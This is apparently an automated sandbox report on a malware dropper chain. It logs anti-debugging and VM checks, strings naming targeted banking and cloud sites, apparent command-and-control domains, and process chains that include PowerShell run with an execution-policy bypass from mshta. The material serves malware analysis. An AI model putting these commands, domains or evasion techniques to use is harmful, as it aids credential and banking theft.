Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW.
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: powershell.exe, 00000019.00000002.2953541557.000000000A9FA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter@\]q
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: powershell.exe, 00000019.00000002.2918127173.0000000006FE0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASSOCIATORS OF {\\.\ROOT\Microsoft\Windows\Storage:MSFT_Partition.ObjectId="{1}\\\\user-PC\\root/Microsoft/Windows/Storage/Providers_v2\\WSP_Partition.ObjectId=\"{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PR:{00000000-0000-0000-0000-500700000000}\\\\?\\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\""} WHERE AssocClass = MSFT_DiskToPartition ResultClass = MSFT_Disk ResultRole = Disk Role = Partitionion has failed the
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: powershell.exe, 00000019.00000002.2933297668.000000000830F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: {1}\\user-PC\root/Microsoft/Windows/Storage/Providers_v2\WSP_Partition.ObjectId="{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PR:{00000000-0000-0000-0000-500700000000}\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}"
Source: file.exe, 00000000.00000002.2411288115.0000000000764000.00000040.00000001.01000000.00000003.sdmp, DocumentsECAFHIIJJE.exe, 00000014.00000002.2465829804.0000000000916000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000015.00000002.2488317379.00000000011D6000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000017.00000002.3291976640.00000000011D6000.00000040.00000001.01000000.0000000E.sdmp, file1.exe, 00000018.00000002.2876972921.00000000009CE000.00000040.00000001.01000000.0000000F.sdmp, 4136f86ac7.exe, 0000001E.00000002.3116078239.0000000000DF3000.00000040.00000001.01000000.00000012.sdmp, 4136f86ac7.exe, 0000001E.00000002.3129252471.0000000006044000.00000040.00000800.00020000.00000000.sdmp, 3160604f40.exe, 0000001F.00000002.2927433701.0000000000424000.00000040.00000001.01000000.00000013.sdmp, 0ac2a0f3ae.exe, 00000024.00000002.3120888781.0000000000B9D000.00000040.00000001.01000000.00000019.sdmp, 4136f86ac7.exe, 00000025.00000002.3258230937.0000000000DF3000.00000040.00000001.01000000.00000012.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.000000000149B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 19 { $_type += "VMware ESXi" }
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Process queried: DebugPort
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Process queried: DebugPort
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Process queried: DebugPort
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Code function: 20_2_04C00C4B rdtsc 20_2_04C00C4B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C685FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6C685FF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C68C410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C68C410
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Code function: 20_2_0075652B mov eax, dword ptr fs:[00000030h] 20_2_0075652B
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Code function: 20_2_0075A302 mov eax, dword ptr fs:[00000030h] 20_2_0075A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 21_2_0101A302 mov eax, dword ptr fs:[00000030h] 21_2_0101A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 21_2_0101652B mov eax, dword ptr fs:[00000030h] 21_2_0101652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_0101A302 mov eax, dword ptr fs:[00000030h] 23_2_0101A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_0101652B mov eax, dword ptr fs:[00000030h] 23_2_0101652B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C65B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C65B66C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C65B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C65B1F7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C80AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C80AC62
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: amsi64_8996.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: file.exe PID: 3724, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 8712, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 4136f86ac7.exe PID: 8836, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3160604f40.exe PID: 5264, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 4136f86ac7.exe PID: 9108, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY3.ps1, type: DROPPED
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 "
Source: file1.exe, 00000018.00000003.2768557455.0000000005A85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {"ConfigIDs":"{\"ECS\":\"P-R-1082570-1-11,P-D-42388-2-6\",\"Edge\":\"P-X-1253166-4-5,P-X-1126445-2-5,P-X-1159506-2-5,P-X-1137521-3-11,P-X-1116674-11-34,P-X-1095018-2-6,P-X-1096650-2-6,P-X-1085156-1-3,P-X-1077147-1-9,P-X-1069756-2-8,P-X-1071593-2-4,P-X-1061902-3-17,P-X-1048071-1-5,P-X-1010579-1-9,P-X-1008556-23-102,P-X-1036081-1-3,P-X-1012411-2-9,P-X-97954-9-100,P-R-1068861-4-11,P-R-1008497-12-13,P-R-87486-2-17,P-R-67067-6-63,eej45377:646690,41612551:479862,cfg5e884:560003,eggf0128:472101,sendtabqr:498558,edauth0529:481519,9ffeg962:402950,domexpansion_v1:408272,ed0317:378541,producttrackingalertsettings_v1cf:458226,2chfa640:363442,edpas404:384675,hjd07315:315108,edenh823:312573,i8id9958:449025,v1_onlineselextraction:330872,edklo447:358232,linkui:481501\",\"EdgeConfig\":\"P-R-1457891-1-5,P-R-1279375-1-7,P-R-1221542-1-5,P-R-1176033-4-5,P-R-1174322-1-4,P-R-1129815-1-5,P-R-1148262-1-5,P-R-1147287-1-6,P-R-1136203-1-4,P-R-1133477-1-4,P-R-1130507-1-6,P-R-1113531-4-9,P-R-1099640-1-4,P-R-1098501-1-7,P-R-1090419-1-5,P-R-1082109-1-6,P-R-1082170-11-26,P-R-1052391-1-8,P-R-1039913-1-22,P-R-1036635-2-5,P-R-110491-24-85,P-R-68474-9-12,P-R-61206-14-20,P-R-61153-10-15,P-R-60617-7-21,P-R-45373-8-85,P-R-46265-41-108,P-D-1150672-1-4\",\"EdgeDomainActions\":\"P-R-1093245-1-19,P-R-1037936-1-14,P-R-1024693-1-11,P-R-108604-1-36,P-R-78306-1-18,P-R-73626-1-17,P-R-71025-5-13,P-R-63165-4-26,P-R-53243-2-7,P-R-40093-3-26,P-R-38744-7-97,P-R-31899-21-484,P-D-1138318-1-3,P-D-98331-6-32\",\"EdgeFirstRunConfig\":\"P-R-1075865-1-7\",\"Segmentation\":\"P-R-1159985-1-5,P-R-1113915-25-11,P-R-1098334-1-6,P-R-66078-1-3,P-R-66077-1-5,P-R-60882-1-2,P-R-43082-3-5,P-R-42744-1-2\"}","Edge":{"AccountLevelSyncReclaim":{"enableFeatures":["msAccountLevelSyncConsent","msNurturingAccountLevelSyncConsentSyncOff","msNurturingAccountLevelSyncConsentSyncOn"]},"AdsPlatformXEdgeexp":{"enableFeatures":["msEdgeAdPlatformUI","msEdgeAdPlatformBingPathsV3","msEdgeAdPlatformProtobufMigration","msEdgeAdPlatformUseIdentity"]},"ArrestUserChurn":{"enableFeatures":["msLoadChromeWebstoreByDefault"]},"DefaultBrowserBannerExternalStableRollout":{"enableFeatures":["msNurturingDefaultBrowserBannerCloseBtn","msNurturingUrlParser","msEdgeNurFIrisSupport"],"parameters":[{"name":"DismissalCap","value":"1000"}]},"DisablePageActionIcons":{"enableFeatures":["msOmniboxDisablePageActionIcons"],"parameters":[{"name":"msDisableOmniboxTriggeredIcon","value":"12,16"}]},"DisconnectedErrorPageVariations":{"enableFeatures":["msShowTroubleshootButtonOnErrorPage","msDisconnectedErrorPageVariation2"]},"EdgeOnRampShowVersionWhatsNew":{"enableFeatures":["msEdgeOnRampShowWhatsNew"],"parameters":[{"name":"Browser Version","value":"130.0.0.0"}]},"EdgeShoppingDomMutationExpansion":{"enableFeatures":["msShoppingExp67"]},"EdgeShoppingOnlineSelectorExtraction":{"enableFeatures":["msShoppingExp1"]},"EdgeVpnAllSites":{"enableFeatures":["msEnableVpnAllSites"]},"EnhancedTextContrast":{"enableFeatures":["msEnhancedTextContrast"]},"ExternalStoreZeroSearc
Source: file1.exe, 00000018.00000003.2730971554.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: faintbl0w.sbs
Source: file1.exe, 00000018.00000003.2730971554.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: 300snails.sbs
Source: file1.exe, 00000018.00000003.2730971554.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: 3xc1aimbl0w.sbs
Source: file1.exe, 00000018.00000003.2730971554.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: thicktoys.sbs
Source: 4136f86ac7.exe, 0000001E.00000002.3115438183.0000000000C11000.00000040.00000001.01000000.00000012.sdmp String found in binary or memory: scriptyprefej.store
Source: 4136f86ac7.exe, 0000001E.00000002.3115438183.0000000000C11000.00000040.00000001.01000000.00000012.sdmp String found in binary or memory: navygenerayk.store
Source: 4136f86ac7.exe, 0000001E.00000002.3115438183.0000000000C11000.00000040.00000001.01000000.00000012.sdmp String found in binary or memory: founpiuer.store
Source: 4136f86ac7.exe, 0000001E.00000002.3115438183.0000000000C11000.00000040.00000001.01000000.00000012.sdmp String found in binary or memory: necklacedmny.store
Source: 4136f86ac7.exe, 0000001E.00000002.3115438183.0000000000C11000.00000040.00000001.01000000.00000012.sdmp String found in binary or memory: thumbystriw.store
Source: 4136f86ac7.exe, 0000001E.00000002.3115438183.0000000000C11000.00000040.00000001.01000000.00000012.sdmp String found in binary or memory: fadehairucw.store
Source: 4136f86ac7.exe, 0000001E.00000002.3115438183.0000000000C11000.00000040.00000001.01000000.00000012.sdmp String found in binary or memory: crisiwarny.store
Source: 4136f86ac7.exe, 0000001E.00000002.3115438183.0000000000C11000.00000040.00000001.01000000.00000012.sdmp String found in binary or memory: presticitpo.store
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsECAFHIIJJE.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\DocumentsECAFHIIJJE.exe "C:\Users\user\DocumentsECAFHIIJJE.exe"
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe "C:\Users\user\AppData\Local\Temp\1005627001\file1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1005628041\k4pDgO.ps1"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe "C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe "C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe "C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 "
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C854760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free, 0_2_6C854760
Source: file.exe, file.exe, 00000000.00000002.2411288115.0000000000764000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: ^b|Program Manager
Source: powershell.exe, 00000022.00000002.3292099813.000000E6B82CA000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: Program Manager Chrome
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C65B341 cpuid 0_2_6C65B341
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1005628041\k4pDgO.ps1 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1005637001\l.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1005637001\l.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
